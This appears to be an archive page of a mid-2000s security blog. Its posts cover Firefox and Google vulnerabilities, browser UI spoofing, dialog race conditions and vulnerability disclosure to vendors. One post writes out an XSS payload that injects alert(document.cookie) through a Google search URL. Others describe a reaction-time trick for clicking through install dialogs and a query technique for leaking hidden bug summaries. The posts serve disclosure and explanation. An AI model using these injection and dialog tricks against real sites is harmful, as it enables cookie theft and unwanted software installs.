Security advisories for old versions of Firefox

Dan Veditz has updated the Mozilla Foundation Security Advisories page with information about holes that were fixed for Firefox 1.0, Thunderbird 0.9 and 1.0, and Mozilla 1.7.5.

None of the holes were arbitrary-code-execution holes, which surprised me. The worst hole fixed for Firefox 1.0 was the javascript: Live Bookmarks hole, which required some user cooperation and allowed attackers to steal cookies and sometimes execute arbitrary code. In contrast, many previous Mozilla and Firefox releases included new fixes for memory management holes such as buffer overflows. Exploits for memory management holes are harder to write, but they allow attackers to execute arbitrary code without getting any cooperation from users.

Posted on January 25, 2005 at 09:45 PM in Mozilla, Security | Comments (10) | TrackBack (0)

Coming soon to squarefree.com

I have trouble completing personal projects that take longer than a weekend. I often lose interest after doing the interesting parts and procrastinate indefinitely on completing the projects since they have no deadline. In August 2004, I set a goal compatible with my attention span: "start and finish one interesting project every weekend". This goal helped me write a bunch of Firefox extensions and one or two Firefox patches, but of course it didn't help me finish longer projects. Now I have several half-finished longer-than-a-weekend projects piled up.

I'm hoping that this "coming soon" post will make me finish at least some of these projects soon. Also, you can tell me which projects you want me to finish first.

  • A novel attack against something that was proven secure using a what I think is a poor definition of security.
  • A proof that a popular puzzle is NP-complete.
  • A list of some of Firefox's weaknesses, design elements that can lead to security holes.
  • Security tips for Firefox users (current version). Since this document is already 7 printed pages long without screenshots, it may be more effective at pointing out critical user interface flaws in Firefox and Windows than at educating users.
  • Security tips for web application developers (current version).
  • Security tips for Firefox developers and extension developers (current version).
Posted on January 17, 2005 at 07:05 AM in Mozilla, Research, Security | Comments (6) | TrackBack (1)

My impressions of Google Desktop Search

Google Desktop Search is useful enough for me to keep it installed, but I wouldn't say that it works well.

Functionality

  • The file I'm looking for is often missing from Google Desktop Search's index. Even the filename is missing. I can't tell if it decided to skip the file because of its extension, contents, location, or changed-on date. Sometimes touching the file gets it indexed, but sometimes it doesn't.
  • It "caches" old versions of files often enough to take up disk space unnecessarily, but not often enough that I can rely on it for a revision history when I break something.
  • Since Google Desktop Search is slower than www.google.com, leaving "Show Desktop Search results on Google Web Search result pages" checked makes it slow down web searches.
  • It gets much slower if I add num=100 to the URLs. A search with num=100 usually takes 3 seconds. This would be ok if it streamed the results, but I just don't see anything for 3 seconds. (There's no UI for adding num=100, so it's not really fair to complain.)

Security

  • "Show Desktop Search results on Google Web Search result pages", which is checked by default, elevates any XSS hole in www.google.com to a read-my-files hole.
  • Google Desktop Search uses an interesting scheme to mitigate XSS and CSRF holes: it includes a hash in every URL, even the root. The hash includes the path and sometimes includes the query parameters. If the hash is missing or doesn't match, it returns "Invalid Request".
  • Clicking a link to an .exe file in search results runs it without any warning.
  • The web site doesn't mention the current version number. The program doesn't have a "Check for upgrades" link, and if checks automatically, it makes no indication of that fact.
  • Any web page can detect whether you have Google Desktop Search running by loading an image (or perhaps any URL) from http://127.0.0.1:4664/.
  • The index is stored in a predictable location. "File upload holes", which let sites read your files if they know the filenames, are common in web browsers. File upload holes that require no user interaction are usually fixed quickly. But file upload holes that do require user interaction are not always fixed quickly. Two file upload holes requiring user interaction that I reported in 2000 are still present in IE and Firefox.
Posted on October 22, 2004 at 03:38 AM in Google, Security | Comments (7) | TrackBack (0)

Hidden search results - answer

Michael Lefevre and mpt gave correct, but incomplete, answers to the question in my previous blog entry in their comments. Part of Michael's answer:

You'd have to work out which bits of closed bugs should be queryable (if you give any indication of a result based on, say, summary or comment queries, you could be disclosing important bits of the closed bug).

Indicating hidden results for a summary query would indeed disclose an important bit of the bug: its summary. First, the attacker would query for bugs with summaries starting with "a", "b", etc. Discovering that at least one hidden bug's summary begins with "b", the attacker would query for bugs whose summaries start with "ba", "bb", etc. After a few hundred more queries, the attacker would have the entire summary.

Posted on August 14, 2004 at 08:53 PM in Google, Mozilla, Security | Comments (2) | TrackBack (0)

Hidden search results

Google sometimes hides search results to ensure that search results are varied:

In order to show you the most relevant results, we have omitted some entries very similar to the 15 already displayed. If you like, you can repeat the search with the omitted results included. [foo site:squarefree.com]

or due to bad laws:

In response to a complaint we received under the Digital Millennium Copyright Act, we have removed 1 result(s) from this page. If you wish, you may read the DMCA complaint for these removed results. [scientology site:xenu.net]

Bugzilla also sometimes hides search results, to protect confidential bugs such as undisclosed security holes. Unlike Google, Bugzilla doesn't tell you that there are hidden results for your search. This caused me to worry that potential employers would think I can't count. It also makes it impossible for Peter(6) and others to tell exactly how many release blockers there are.

When Bugzilla hides search results from you, why doesn't it inform you like Google does?

Hint: while "Because nobody implemented that feature" may be technically correct, that's not the answer I'm looking for.

Posted on August 14, 2004 at 02:42 AM in Google, Mozilla, Security | Comments (8) | TrackBack (0)

Bounties

mozilla.org now has a security bug bounty program, which offers $500 to people who discover "critical" security holes. Meanwhile, Microsoft offers a $250,000 bounty for catching virus authors.

Posted on August 02, 2004 at 09:36 AM in Mozilla, Security | Comments (2) | TrackBack (0)

Preventing browser UI spoofing

The problem of web sites being able to spoof browser UI was on Slashdot recently. This is a hard problem that browser vendors have known about for a long time.

The most popular solution, preventing web sites from disabling the status bar, is insufficient. Keeping the status bar always on would only keep malcious sites from spoofing https sites. In contrast, keeping the address bar always on would keep malicious sites from spoofing all web sites. Keeping the address bar always on would also be more effective at preventing web sites from spoofing native applications.

One argument for using the status bar is that it's smaller than the address bar. But it's only about 8px shorter if we use small-icons mode for pop-ups, and we can probably make it even shorter.

One suggestion was to show the hostname in the status bar. The hope is that users would then look there instead of the address bar to verify what site they're on. I don't think enough users would change their habits for this to work. It would also require cluttering the status bar in ordinary windows, which seems like a high price to pay to save 8px in pop-up windows.

Whatever we choose (address bar or status bar), we can do things to avoid breaking existing web sites. If a web site requests a 400x300 window without an address bar, we can give it a 400x334 window with an address bar. We can add a menubutton to the address toolbar in pop-up windows with menu items "Restore toolbars", "Hide address toolbar", and "Hide address toolbar in all pop-ups from https://gmail.google.com/".

Posted on August 01, 2004 at 11:54 PM in Mozilla, Security | Comments (13) | TrackBack (1)

Adam Sacarny on the shell: hole

Adam Sacarny, author of the Mozilla shell: vulnerability timeline, discusses what Mozilla can do to work around future holes in programs that register themselves as protocol handlers.

Posted on July 25, 2004 at 08:54 PM in Mozilla, Security | Comments (0) | TrackBack (0)

Race conditions in security dialogs

I discovered arbitrary code execution holes in Firefox, Internet Explorer, and Opera that involve human reaction time. One version of the attack works like this:

The secret word fills the blank in the sentence 'If ____ web developers would use alternate text correctly!'  It is all lowercase.

The page contains a captcha displaying the word "only" and asks you to type the word to verify that you are a human. As soon as you type 'n', the site attempts to install software, resulting in a security dialog. When you type 'y' at the end of the word, you trigger the 'Yes' button in the dialog. I made a demo of this attack for Firefox and Mozilla.

Another form of the attack involves convincing the user to double-click a certain spot on the screen. This spot happens to be the location where the 'Yes' button will appear. The first click triggers the dialog; the second click lands on the 'Yes' button. I made a demo of this attack for Firefox and Mozilla.

These types of attack work on any security dialog that can be triggered by untrusted content. The attack is most useful in a dialog where one of the buttons means "Yes, let this untrusted content run arbitrary code". Firefox has such a dialog in the form of the extension installation (XPI) dialog. Similarly, Internet Explorer has the ActiveX installation dialog and Opera has an "Open" button for downloaded executables. Programs other than browsers might also be vulnerable.

Firefox's solution, from bug 162020, is to delay enabling the "Yes"/"Install" buttons until three seconds after the dialog appears. I believe that this is the only possible fix other than completely denying untrusted content the ability to pose the dialog. Unfortunately, this fix is frustrating for users who install extensions often.

Some users have been intentionally lowering the delay to 0 seconds, which frustrates me. These users think the delay was added merely to force everyone to read the dialog. I surprises me that these users were not able to figure out the security hole given the fix. Ironically, advanced users are the most susceptible to these attacks, because they type and double-click faster than they react to unexpected stimuli.

It might be possible to lower the delay to less than three seconds, making it less annoying, without jeopardizing security. Designing experiments to determine the minimum "safe" delay would be tricky. You would want to do everything an attacker could do to increase participants' reaction time: give them a complicated task, make new rectangles appear every second to make the dialog less unexpected, etc.

It might make sense to make the dialog appear only after the user clicks a statusbar indicator that means "This web site wants to install software". This would get rid of the problem of choosing a delay, and it wouldn't require users who want to install extensions to wait.

Cross-browser security holes

Slashdot reports a "new" spoofing hole in many browsers, including older versions of Mozilla, discovered by Mark Laurence. The hole is that site A can load its own content into a frame on site B, and the content will appear to be from site B because the frameset is still from site B. This attack only works if site B is a framed site, so some banks are not affected.

A comment I posted on Slashdot:

Lorenzo Colitti and I found the same hole several weeks ago, independently of Mark Laurence. I reported it to mozilla.org on June 11 and to Microsoft and Opera on June 16. I got different results from each browser maker:

Mozilla (bugzilla.mozilla.org 246448)
Fixed on June 14. Firefox 0.9 released with the fix June 14. Mozilla 1.7 released with the fix June 17.
Opera (bugs.opera.com 145283)
No response.
Microsoft
On June 21, I received an e-mail containing the following: "... is by design. To prevent this behavior, set the 'Navigate sub-frames across different domains' zone option to Prompt or disable in the Internet zone. We are trying to get this fixed in Longhorn ... on getting this blocking on by default in XP SP2 but blocking these types of navigations is an app compatibility issue on many sites." I usually don't get any response from Microsoft when I report security holes to them; I think I only got a response this time because I used my employer's premier support contract with Microsoft.

Another cross-browser security hole I found (bugzilla.mozilla.org 162020) got similar responses from each browser maker: fixed in Mozilla 1.7 and Firefox 0.9; no response from Opera; confusing statement from Microsoft mentioning XP SP2. 162020 is an arbitrary code execution hole.

To be fair to Microsoft, the fix for the frame-spoofing hole did break a few sites. According to a bug filed today, the Charles Schwab brokerage site is one of the broken sites.

Posted on July 01, 2004 at 01:30 PM in Mozilla, Security | Comments (1) | TrackBack (1)

Sending encrypted e-mail

I had to install Enigmail and gpg in order to send a vulnerability report to CERT.

I am not happy with gpg's UI. I had to read this page to figure out which command-line options I had to use. GPG gives a vague yet serious-sounding warning if you use an empty "passphrase" when creating your key. (As far as I can tell, a strong passphrase protects you against someone who can read the file containing your private key, but other than that it doesn't increase security.) It asked me to move the mouse around and bang on the keyboard while it generated my keys, but it generated the keys in less than a second, making me worry that it didn't use any good sources of entropy when it created my key.

I was able to figure out how to use Enigmail without much trouble. I encountered lots of warning and error messages, but I think they were all necessary. (I didn't like the text "This message will appear 1 more time" at the bottom of most of the warnings, though. I don't want Enigmail to keep me from making a mistake just because I almost made the mistake 2 times in the past!) Enigmail's options were split between the Options window and the Account Settings window, but that's a problem with Thunderbird in general.

Neither CERT nor Enigmail warned me that the subject of my e-mail would be sent unencrypted.

Posted on April 18, 2004 at 12:15 AM in Mozilla, Security | Comments (1) | TrackBack (0)

How to report a security hole to Microsoft

Hixie helped me report a security hole to Opera. Then Hixie and his friends at the W3C Technical Plenary tried to help me report it to Microsoft, offering these suggestions:

  • "There's probably a form on microsoft.com/ie."
  • "You report it to cnet."
  • "You break into Microsoft's systems using the exploit, and insert the bug into their bug system. Since you can only do that with security bugs, that filters out the non-security ones."

I think I reported the bug to Microsoft successfully. The language on Microsoft's form ("enchancement suggestion" and "wish" rather than "bug report") was discouraging, but I did get to check a box labeled "Security".

Posted on March 10, 2004 at 12:59 AM in Mozilla, Security | Comments (4) | TrackBack (0)

MozillaZine fixes information leak

Three hours before Firefox 0.8 was released, I found a security hole in Mozillazine: you could see the titles of unpublished articles (e.g. http://mozillazine.org/talkback.html?article=4283) in the titlebar. Using this hole, I accidentally discovered the name change before the release. The hole has been fixed.

jesus_X informs me that long ago, MozillaZine let you see the full text of unpublished articles. I guess the original hole was partially fixed, leaving only the title of the article visible.

Posted on February 11, 2004 at 12:38 AM in Mozilla, Security | Comments (8) | TrackBack (0)

Another Google security hole

This simple hole allows any site to change your Google preferences behind your back. Someone could change your Google interface language to Pig Latin. (Why Pig Latin rather than, say, Russian? It's more fun, and the "Google.com in English" link isn't as obvious when the surrounding text looks like English.) Someone could make your searches only turn up English results. Worst of all, someone could stop you from using Google to search for porn by turning on SafeSearch.

Slashdot's solution to this type of hole is "formkeys". I don't know how other sites solve it. But one incorrect solution is to check referers.

Posted on October 23, 2003 at 09:30 PM in Google, Security | Comments (2) | TrackBack (0)

Minor security hole in Google

Webmasterworld's "hitchhiker" and I found a security hole in Google today. He searched for something like "this can't be true" and his browser reported a JavaScript syntax error. I pointed out that with a carefully constructed query string, you can get Google to spit out something syntactically valid that does whatever you want. For example:

http://www.google.com/search?q='+alert(document.cookie)+'
causes Google to generate the following onClick attribute: onClick="c('http://images.google.com/images?q='+alert(document.cookie)+'
&hl=en&lr=&ie=UTF-8&c2coff=1&safe=off','wi',event);"

If you follow the link and click a tab (web, images, groups, directory, news), you'll see your Google cookie in a dialog.

Hitchhiker responded:

I just can't believe G made that kinda mistake.

ESCAPE ESCAPE!

Escaping is not always the best solution. When I found a similar hole in some JavaScript code in Mozilla, ducarroz's solution was to use an alternative window.setTimeout syntax. The normal version of setTimeout takes a string to be parsed and executed; the alternative version takes a function and parameters. Instead of escaping the untrusted input, we avoided parsing a string containing the untrusted input.

Posted on October 23, 2003 at 08:15 PM in Google, Mozilla, Security | Comments (2) | TrackBack (0)

Selene wins

I use a program called Sharescan to search the Windows network at Mudd. I have found students sharing archived mail, friends' backup CDs, photos of themselves naked, and entire hard drives. I usually look through the data to determine the owner and remind them that the Windows network is for sharing music inform them that they're sharing data that they probably weren't intending to share.

Today Selene told me over AIM that my shared folder was world-writable. Then she told me my printer was also shared and printed a page saying "Wuzza!" using my printer.

Posted on September 14, 2003 at 09:45 PM in Security | Comments (3) | TrackBack (0)